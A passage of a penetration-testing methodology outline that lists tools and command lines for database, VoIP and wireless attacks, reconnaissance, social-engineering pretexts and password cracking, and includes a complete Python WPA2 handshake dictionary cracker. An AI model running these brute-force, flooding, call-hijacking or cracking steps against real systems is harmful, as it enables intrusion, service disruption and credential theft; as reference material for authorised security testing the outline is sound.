13.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

13.22.2.4. Check Password

13.22.2.5. orabf

13.22.2.5.1. orabf [hash]:[username] [options]

13.22.2.6. thc-orakel

13.22.2.6.1. Cracker

13.22.2.6.2. Client

13.22.2.6.3. Crypto

13.22.2.7. DBVisualisor

13.22.2.7.1. Sql scripts from pentest.co.uk

13.22.2.7.2. Manual sql input of previously reported vulnerabilities

13.22.3. Oracle Reference Material

13.22.3.1. Understanding SQL Injection

13.22.3.2. SQL Injection walkthrough

13.22.3.3. SQL Injection by example

13.22.3.4. Advanced SQL Injection in Oracle databases

13.22.3.5. Blind SQL Injection

13.22.3.6. SQL Cheatsheets

13.23. NFS Port 2049 open

13.23.1. NFS Enumeration

13.23.1.1. showmount -e hostname/ip_address

13.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

13.23.2. NFS Brute Force

13.23.2.1. Interact with NFS share and try to add/delete

13.23.2.2. Exploit and Confuse Unix

13.23.3. Examine Configuration Files

13.23.3.1. /etc/exports

13.23.3.2. /etc/lib/nfs/xtab

13.23.4. nmap nse script

13.23.4.1. nfs-showmount

13.24. Compaq/HP Insight Manager Ports 2301, 2381 open

13.24.1. HP Enumeration

13.24.1.1. Authentication Method

13.24.1.1.1. Host OS Authentication

13.24.1.1.2. Default Authentication

13.24.1.2. Wikto

13.24.1.3. Nstealth

13.24.2. HP Bruteforce

13.24.2.1. Hydra

13.24.2.2. Acunetix

13.24.3. Examine Configuration Files

13.24.3.1. path.properties

13.24.3.2. mx.log

13.24.3.3. CLIClientConfig.cfg

13.24.3.4. database.props

13.24.3.5. pg_hba.conf

13.24.3.6. jboss-service.xml

13.24.3.7. .namazurc

13.25. MySQL port 3306 open

13.25.1. Enumeration

13.25.1.1. nmap -A -n -p3306 <IP Address>

13.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

13.25.1.3. telnet IP_Address 3306

13.25.1.4. use test; select * from test;

13.25.1.5. To check for other DBs: show databases

13.25.2. Administration

13.25.2.1. MySQL Network Scanner

13.25.2.2. MySQL GUI Tools

13.25.2.3. mysqlshow

13.25.2.4. mysqlbinlog

13.25.3. Manual Checks

13.25.3.1. Default usernames and passwords

13.25.3.1.1. username: root password:

13.25.3.1.2. testing

13.25.3.2. Configuration Files

13.25.3.2.1. Operating System

13.25.3.2.2. Command History

13.25.3.2.3. Log Files

13.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

13.25.3.2.5. MySQL data directory (Location specified in my.cnf)

13.25.3.2.6. SSL Check

13.25.3.3. Privilege Escalation

13.25.3.3.1. Current Level of access

13.25.3.3.2. Access passwords

13.25.3.3.3. Create a new user and grant him privileges

13.25.3.3.4. Break into a shell

13.25.4. SQL injection

13.25.4.1. mysql-miner.pl

13.25.4.1.1. mysql-miner.pl http://target/ expected_string database

13.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

13.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

13.25.5. References.

13.25.5.1. Design Weaknesses

13.25.5.1.1. MySQL running as root

13.25.5.1.2. Exposed publicly on Internet

13.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

13.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

13.26. RDesktop port 3389 open

13.26.1. Rdesktop Enumeration

13.26.1.1. Remote Desktop Connection

13.26.2. Rdesktop Bruteforce

13.26.2.1. TSGrinder

13.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

13.26.2.2. Tscrack

13.27. Sybase Port 5000+ open

13.27.1. Sybase Enumeration

13.27.1.1. sybase-version ip_address from NGS

13.27.2. Sybase Vulnerability Assessment

13.27.2.1. Use DBVisualiser

13.27.2.1.1. Sybase Security checksheet

13.27.2.1.2. Manual sql input of previously reported vulnerabilities

13.27.2.2. NGS Squirrel for Sybase

13.28. SIP Port 5060 open

13.28.1. SIP Enumeration

13.28.1.1. netcat

13.28.1.1.1. nc IP_Address Port

13.28.1.2. sipflanker

13.28.1.2.1. python sipflanker.py 192.168.1-254

13.28.1.3. Sipscan

13.28.1.4. smap

13.28.1.4.1. smap IP_Address/Subnet_Mask

13.28.1.4.2. smap -o IP_Address/Subnet_Mask

13.28.1.4.3. smap -l IP_Address

13.28.2. SIP Packet Crafting etc.

13.28.2.1. sipsak

13.28.2.1.1. Tracing paths: - sipsak -T -s sip:username@domain

13.28.2.1.2. Options request:- sipsak -vv -s sip:username@domain

13.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

13.28.2.2. siprogue

13.28.3. SIP Vulnerability Scanning/ Brute Force

13.28.3.1. tftp bruteforcer

13.28.3.1.1. Default dictionary file

13.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

13.28.3.2. VoIPaudit

13.28.3.3. SiVuS

13.28.4. Examine Configuration Files

13.28.4.1. SIPDefault.cnf

13.28.4.2. asterisk.conf

13.28.4.3. sip.conf

13.28.4.4. phone.conf

13.28.4.5. sip_notify.conf

13.28.4.6. <Ethernet address>.cfg

13.28.4.7. 000000000000.cfg

13.28.4.8. phone1.cfg

13.28.4.9. sip.cfg etc. etc.

13.29. VNC port 5900^ open

13.29.1. VNC Enumeration

13.29.1.1. Scans

13.29.1.1.1. 5900^ for direct access; 5800 for HTTP access.

13.29.2. VNC Brute Force

13.29.2.1. Password Attacks

13.29.2.1.1. Remote

13.29.2.1.2. Local

13.29.3. Examine Configuration Files

13.29.3.1. .vnc

13.29.3.2. /etc/vnc/config

13.29.3.3. $HOME/.vnc/config

13.29.3.4. /etc/sysconfig/vncservers

13.29.3.5. /etc/vnc.conf

13.30. Tor Port 9001, 9030 open

13.30.1. Tor Node Checker

13.30.1.1. Ip Pages

13.30.1.2. Kewlio.net

13.30.2. nmap NSE script

13.31. Jet Direct 9100 open

13.31.1. hijetta

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker

14.2.9.1. python sipflanker.py 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP

14.2.14.1. smap IP_Address/Subnet_Mask

14.2.14.2. smap -o IP_Address/Subnet_Mask

14.2.14.3. smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder

14.3.6.1. ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder

14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak

14.3.16.1. Tracing paths: sipsak -T -s sip:username@domain

14.3.16.2. OPTIONS request: sipsak -vv -s sip:username@domain

14.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force

14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder

14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support)

14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.5. Signaling Manipulation Tools

14.5.1. AuthTool

14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound

14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound

14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK

14.7.2.1. Note: - Add-on for Immunity Canvas

14.8. References

14.8.1. URL's

14.8.1.1. Common Vulnerabilities and Exposures (CVE)

14.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

14.8.1.2. Default Passwords

14.8.1.3. Hacking Exposed VoIP

14.8.1.3.1. Tool Pre-requisites

14.8.1.4. VoIPsa

14.8.2. White Papers

14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

14.8.2.2. An Analysis of VoIP Security Threats and Tools

14.8.2.3. Hacking VoIP Exposed

14.8.2.4. Security testing of SIP implementations

14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

14.8.2.6. Two attacks against VoIP

14.8.2.7. VoIP Attacks!

14.8.2.8. VoIP Security Audit Program (VSAP)

14.8.3. Spirent ThreatEx

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out a wireless assessment. All of it is needed to give the tester, and hence the customer, a clear and concise picture of the network under assessment. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

15.1.1. Site Map

15.1.1.1. RF Map

15.1.1.1.1. Lines of Sight

15.1.1.1.2. Signal Coverage

15.1.1.2. Physical Map

15.1.1.2.1. Triangulate APs

15.1.1.2.2. Satellite Imagery

15.1.2. Network Map

15.1.2.1. MAC Filter

15.1.2.1.1. Authorised MAC Addresses

15.1.2.1.2. Reaction to Spoofed MAC Addresses

15.1.2.2. Encryption Keys utilised

15.1.2.2.1. WEP

15.1.2.2.2. WPA/PSK

15.1.2.2.3. 802.1x

15.1.2.3. Access Points

15.1.2.3.1. ESSID

15.1.2.3.2. BSSIDs

15.1.2.4. Wireless Clients

15.1.2.4.1. MAC Addresses

15.1.2.4.2. Intercepted Traffic

15.2. SipRogue

15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

15.4. Wireless Toolkit

15.4.1. Wireless Discovery

15.4.1.1. Aerosol

15.4.1.2. Airfart

15.4.1.3. Aphopper

15.4.1.4. Apradar

15.4.1.5. BAFFLE

15.4.1.6. inSSIDer

15.4.1.7. iWEPPro

15.4.1.8. karma

15.4.1.9. KisMAC-ng

15.4.1.10. Kismet

15.4.1.11. MiniStumbler

15.4.1.12. Netstumbler

15.4.1.13. Vistumbler

15.4.1.14. Wellenreiter

15.4.1.15. Wifi Hopper

15.4.1.16. WirelessMon

15.4.1.17. WiFiFoFum

15.4.2. Packet Capture

15.4.2.1. Airopeek

15.4.2.2. Airpcap

15.4.2.3. Airtraf

15.4.2.4. Apsniff

15.4.2.5. Cain

15.4.2.6. Commview

15.4.2.7. Ettercap

15.4.2.8. Netmon

15.4.2.8.1. nmwifi

15.4.2.9. Wireshark

15.4.3. EAP Attack tools

15.4.3.1. eapmd5pass

15.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

15.4.4. Leap Attack Tools

15.4.4.1. asleap

15.4.4.2. thc leap cracker

15.4.4.3. anwrap

15.4.5. WEP/ WPA Password Attack Tools

15.4.5.1. Airbase

15.4.5.2. Aircrack-ptw

15.4.5.3. Aircrack-ng

15.4.5.4. Airsnort

15.4.5.5. cowpatty

15.4.5.6. FiOS Wireless Key Calculator

15.4.5.7. iWifiHack

15.4.5.8. KisMAC-ng

15.4.5.9. Rainbow Tables

15.4.5.10. wep attack

15.4.5.11. wep crack

15.4.5.12. wzcook

15.4.6. Frame Generation Software

15.4.6.1. Airgobbler

15.4.6.2. airpwn

15.4.6.3. Airsnarf

15.4.6.4. Commview

15.4.6.5. fake ap

15.4.6.6. void 11

15.4.6.7. wifi tap

15.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

15.4.6.8. FreeRADIUS - Wireless Pwnage Edition

15.4.7. Mapping Software

15.4.7.1. Online Mapping

15.4.7.1.1. WIGLE

15.4.7.1.2. Skyhook

15.4.7.2. Tools

15.4.7.2.1. Knsgem

15.4.8. File Format Conversion Tools

15.4.8.1. ns1 recovery and conversion tool

15.4.8.2. warbable

15.4.8.3. warkizniz

15.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

15.4.8.4. ivstools

15.4.9. IDS Tools

15.4.9.1. WIDZ

15.4.9.2. War Scanner

15.4.9.3. Snort-Wireless

15.4.9.4. AirDefense

15.4.9.5. AirMagnet

15.5. WLAN discovery

15.5.1. Unencrypted WLAN

15.5.1.1. Visible SSID

15.5.1.1.1. Sniff for IP range

15.5.1.2. Hidden SSID

15.5.1.2.1. Deauth client

15.5.2. WEP encrypted WLAN

15.5.2.1. Visible SSID

15.5.2.1.1. WEPattack

15.5.2.2. Hidden SSID

15.5.2.2.1. Deauth client

15.5.3. WPA / WPA2 encrypted WLAN

15.5.3.1. Deauth client

15.5.3.1.1. Capture EAPOL handshake
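
What aircrack-ng or cowpatty do with the captured handshake, as an added example that is not code from the page or from those tools: derive the PMK from each candidate passphrase (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), expand it to the PTK with the two MACs and two nonces, and check whether the first 16 bytes (the KCK) reproduce the MIC carried in message 2. The MACs, nonces and EAPOL frame below are constructed; the passphrase/SSID pair "password"/"IEEE" is the 802.11i Annex H PMK test vector, so the expensive step can be checked against the standard.

```python
import hashlib
import hmac

def pmk(passphrase, ssid):
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step, which is why cowpatty/pyrit precompute it per SSID (rainbow tables)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]   # KCK = PTK[0:16] is all that is needed to verify the MIC

def make_eapol_key_frame(snonce, mic=b"\x00" * 16):
    """EAPOL-Key message 2 of 4 (supplicant -> AP): carries SNonce and the MIC."""
    body = (b"\x02"             # descriptor type: RSN (WPA2)
            + b"\x01\x0a"       # key info: MIC bit, pairwise, descriptor version 2 (HMAC-SHA1)
            + b"\x00\x10"       # key length
            + b"\x00" * 8       # replay counter
            + snonce            # key nonce (32 bytes)
            + b"\x00" * 16      # key IV
            + b"\x00" * 8       # key RSC
            + b"\x00" * 8       # key ID
            + mic               # key MIC (16 bytes)
            + b"\x00\x00")      # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key

MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8   # 81: where Key MIC sits in the frame

def eapol_mic(kck, frame, wpa2=True):
    """MIC = first 16 bytes of HMAC-SHA1 (WPA2) / HMAC-MD5 (WPA) over the frame with MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]

def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, frame, captured_mic, wpa2=True):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame, wpa2), captured_mic):
            return candidate
    return None

# Constructed handshake material (no real capture). "password"/"IEEE" is the
# 802.11i Annex H PMK test vector.
SSID = "IEEE"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

def sample_handshake(passphrase="password"):
    """Build message 2 as a supplicant would, MIC included, for the given passphrase."""
    kck = ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, make_eapol_key_frame(SNONCE))
    return make_eapol_key_frame(SNONCE, mic), mic

if __name__ == "__main__":
    frame, mic = sample_handshake()
    print(crack(["letmein", "password", "hunter2"], SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, mic))
```

Only the SSID, both MACs, both nonces and one MIC-bearing frame are needed, which is why a single deauth to force a re-association is enough and why the deauth step precedes the capture in the outline above. The PBKDF2 cost (4096 HMAC rounds per candidate) is fixed by the standard; the SSID salt is what stops a single precomputed table from covering every network.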

15.5.4. LEAP encrypted WLAN

15.5.4.1. Deauth client

15.5.4.1.1. Break LEAP

15.5.5. 802.1x WLAN

15.5.5.1. Create Rogue Access Point

15.5.5.1.1. Airsnarf

15.5.5.1.2. fake ap

15.5.5.1.3. Hotspotter

15.5.5.1.4. Karma

15.5.5.1.5. Linux rogue AP

15.5.6. Resources

15.5.6.1. URL's

15.5.6.1.1. Wirelessdefence.org

15.5.6.1.2. Russix

15.5.6.1.3. Wardrive.net

15.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

15.5.6.2. White Papers

15.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

15.5.6.2.2. 802.11b Firmware-Level Attacks

15.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

15.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

15.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds

15.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

15.5.6.2.7. Active behavioral fingerprinting of wireless devices

15.5.6.3. Common Vulnerabilities and Exposures (CVE)

15.5.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

17. http://secunia.com/advisories/search/?search=citrix

18. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the target network. Reconnaissance takes two forms, passive and active. Passive reconnaissance is the best starting point: it sends nothing to the target, so it normally evades intrusion detection systems and the other protection afforded to the network, and usually consists of discovering publicly available information with a web browser, newsgroups and similar sources. Active reconnaissance is more intrusive and may show up in audit logs; an attempted DNS zone transfer or a social engineering approach are examples.

18.1. Untitled

18.1.1. Authoritative Bodies

18.1.1.1. IANA - Internet Assigned Numbers Authority

18.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

18.1.1.3. NRO - Number Resource Organisation

18.1.1.4. RIR - Regional Internet Registry

18.1.1.4.1. AFRINIC - African Network Information Centre

18.1.1.4.2. APNIC - Asia Pacific Network Information Centre

18.1.1.4.3. ARIN - American Registry for Internet Numbers

18.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

18.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre

18.1.2. Websites

18.1.2.1. Central Ops

18.1.2.1.1. Domain Dossier

18.1.2.1.2. Email Dossier

18.1.2.2. DNS Stuff

18.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

18.1.2.3. Fixed Orbit

18.1.2.3.1. Autonomous System lookups and other online tools available.

18.1.2.4. Geektools

18.1.2.5. IP2Location

18.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

18.1.2.6. Kartoo

18.1.2.6.1. Metasearch engine that visually presents its results.

18.1.2.7. MyIPNeighbors.com

18.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

18.1.2.8. My-IP-Neighbors.com

18.1.2.8.1. Excellent site that can be used if the above is down

18.1.2.9. myipneighbors.net

18.1.2.10. Netcraft

18.1.2.10.1. Online search tool allowing queries for host information.

18.1.2.11. Passive DNS Replication

18.1.2.11.1. Finds shared domains based on supplied IP addresses

18.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

18.1.2.12. Robtex

18.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

18.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

18.1.2.13. Traceroute.org

18.1.2.13.1. Website listing a large number links to online traceroute resources.

18.1.2.14. Wayback Machine

18.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

18.1.2.15. Whois.net

18.1.3. Tools

18.1.3.1. Cheops-ng

18.1.3.2. Country whois

18.1.3.3. Domain Research Tool

18.1.3.4. Firefox Plugins

18.1.3.4.1. AS Number

18.1.3.4.2. Shazou

18.1.3.4.3. Firecat Suite

18.1.3.5. Gnetutil

18.1.3.6. Goolag Scanner

18.1.3.7. Greenwich

18.1.3.8. Maltego

18.1.3.9. GTWhois

18.1.3.10. Sam Spade

18.1.3.11. Smart whois

18.1.3.12. SpiderFoot

18.2. Internet Search

18.2.1. General Information

18.2.1.1. Web Investigator

18.2.1.2. Tracesmart

18.2.1.3. Friends Reunited

18.2.1.4. Ebay - profiles etc.

18.2.2. Financial

18.2.2.1. EDGAR - Company information, including real-time filings. US

18.2.2.2. Google Finance - General Finance Portal

18.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

18.2.2.4. Companies House UK

18.2.2.5. Land Registry UK

18.2.3. Phone book/ Electoral Roll Information

18.2.3.1. 123people

18.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

18.2.3.2. 192.com

18.2.3.2.1. Electoral Roll Search. UK

18.2.3.3. 411

18.2.3.3.1. Online White Pages and Yellow Pages. US

18.2.3.4. Untitled

18.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

18.2.3.5. BT.com. UK

18.2.3.5.1. Residential

18.2.3.5.2. Business

18.2.3.6. Pipl

18.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

18.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

18.2.3.7. Spokeo

18.2.3.7.1. http://www.spokeo.com/user?q=domain_name

18.2.3.7.2. http://www.spokeo.com/user?q=email_address

18.2.3.8. Yasni

18.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

18.2.3.9. Zabasearch

18.2.3.9.1. People Search Engine. US

18.2.4. Generic Web Searching

18.2.4.1. Code Search

18.2.4.2. Forum Entries

18.2.4.3. Google Hacking Database

18.2.4.4. Google

18.2.4.4.1. Email Addresses

18.2.4.4.2. Contact Details

18.2.4.5. Newsgroups/forums

18.2.4.6. Blog Search

18.2.4.6.1. Yammer

18.2.4.6.2. Google Blog Search

18.2.4.6.3. Technorati

18.2.4.6.4. Jaiku

18.2.4.6.5. Present.ly

18.2.4.6.6. Twitter Network Browser

18.2.4.7. Search Engine Comparison/ Aggregator Sites

18.2.4.7.1. Clusty

18.2.4.7.2. Grokker

18.2.4.7.3. Zuula

18.2.4.7.4. Exalead

18.2.4.7.5. Delicious

18.2.5. Metadata Search

18.2.5.1. Untitled

18.2.5.1.1. MetaData Visualisation Sites

18.2.5.1.2. Tools

18.2.5.1.3. Wikipedia Metadata Search

18.2.6. Social/ Business Networks

18.2.6.1. Untitled

18.2.6.1.1. Africa

18.2.6.1.2. Australia

18.2.6.1.3. Belgium

18.2.6.1.4. Holland

18.2.6.1.5. Hungary

18.2.6.1.6. Iran

18.2.6.1.7. Japan

18.2.6.1.8. Korea

18.2.6.1.9. Poland

18.2.6.1.10. Russia

18.2.6.1.11. Sweden

18.2.6.1.12. UK

18.2.6.1.13. US

18.2.6.1.14. Assorted

18.2.7. Resources

18.2.7.1. OSINT

18.2.7.2. International Directory of Search Engines

18.3. DNS Record Retrieval from publically available servers

18.3.1. Types of Information Records

18.3.1.1. SOA Records - Start of Authority: identifies the primary name server for the zone and carries its serial, refresh, retry, expiry and minimum (negative-cache TTL) values.

18.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

18.3.1.3. NS Records - List of a host’s or domain’s name server(s).

18.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

18.3.1.5. PTR Records - Maps an IP address back to a host name (reverse lookup).

18.3.1.6. SRV Records - Service location record.

18.3.1.7. HINFO Records - Host information record with CPU type and operating system.

18.3.1.8. TXT Records - Generic text record.

18.3.1.9. CNAME - Alias record: maps an additional name to a host's canonical name.

18.3.1.10. RP - Responsible person for the domain.

18.3.2. Database Settings

18.3.2.1. Version.bind

18.3.2.2. Serial

18.3.2.3. Refresh

18.3.2.4. Retry

18.3.2.5. Expiry

18.3.2.6. Minimum

18.3.3. Sub Domains

18.3.4. Internal IP ranges

18.3.4.1. Reverse DNS for IP Range

18.3.5. Zone Transfer

18.4. Social Engineering

18.4.1. Remote

18.4.1.1. Phone

18.4.1.1.1. Scenarios

18.4.1.1.2. Results

18.4.1.1.3. Contact Details

18.4.1.2. Email

18.4.1.2.1. Scenarios

18.4.1.2.2. Software

18.4.1.2.3. Results

18.4.1.2.4. Contact Details

18.4.1.3. Other

18.4.2. Local

18.4.2.1. Personas

18.4.2.1.1. Name

18.4.2.1.2. Phone

18.4.2.1.3. Email

18.4.2.1.4. Business Cards

18.4.2.2. Contact Details

18.4.2.2.1. Name

18.4.2.2.2. Phone number

18.4.2.2.3. Email

18.4.2.2.4. Room number

18.4.2.2.5. Department

18.4.2.2.6. Role

18.4.2.3. Scenarios

18.4.2.3.1. New IT employee

18.4.2.3.2. Fire Inspector

18.4.2.4. Results

18.4.2.5. Maps

18.4.2.5.1. Satellite Imagery

18.4.2.5.2. Building layouts

18.4.2.6. Other

18.5. Dumpster Diving

18.5.1. Rubbish Bins

18.5.2. Contract Waste Removal

18.5.3. Ebay ex-stock sales i.e. HDD

18.6. Web Site copy

18.6.1. HTTrack

18.6.2. teleport pro

18.6.3. Black Widow

19. Password cracking

19.1. Rainbow crack

19.1.1. ophcrack

19.1.2. rainbow tables

19.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

19.2. Ophcrack

19.3. Cain & Abel

19.4. John the Ripper

19.4.1. ./unshadow passwd shadow > file_to_crack

19.4.2. ./john -single file_to_crack

19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

19.4.4. ./john -show file_to_crack

19.4.5. ./john --incremental:All file_to_crack

19.5. fgdump

19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

19.6. pwdump6

19.7. medusa

19.8. LCP

19.9. L0phtcrack (Note: this tool was acquired by Symantec from @stake, and it is their policy not to ship it outside the USA and Canada.)

19.9.1. Domain credentials

19.9.2. Sniffing

19.9.3. pwdump import

19.9.4. sam import

19.10. aiocracker

19.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

20. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can be tested for vulnerabilities. The results are then analysed to determine whether any vulnerability could be exploited to gain access to a target host on the network. Many of the tests these scanners carry out are just banner grabbing/obtaining version information; once the version is known it is compared against the published Common Vulnerabilities and Exposures (CVE) entries and any matches are reported to the user. Other tools use the same methods as a manual pen test and display the raw output received, e.g. showmount -e ip_address would display the NFS shares exported to the scanner, which would then need to be verified by the tester.

20.1. Manual

20.1.1. Patch Levels

20.1.2. Confirmed Vulnerabilities

20.1.2.1. Severe

20.1.2.2. High

20.1.2.3. Medium

20.1.2.4. Low

20.2. Automated

20.2.1. Reports

20.2.2. Vulnerabilities

20.2.2.1. Severe

20.2.2.2. High

20.2.2.3. Medium

20.2.2.4. Low

20.3. Tools

20.3.1. GFI

20.3.2. Nessus (Linux)

20.3.2.1. Nessus (Windows)

20.3.3. NGS Typhon

20.3.4. NGS Squirrel for Oracle

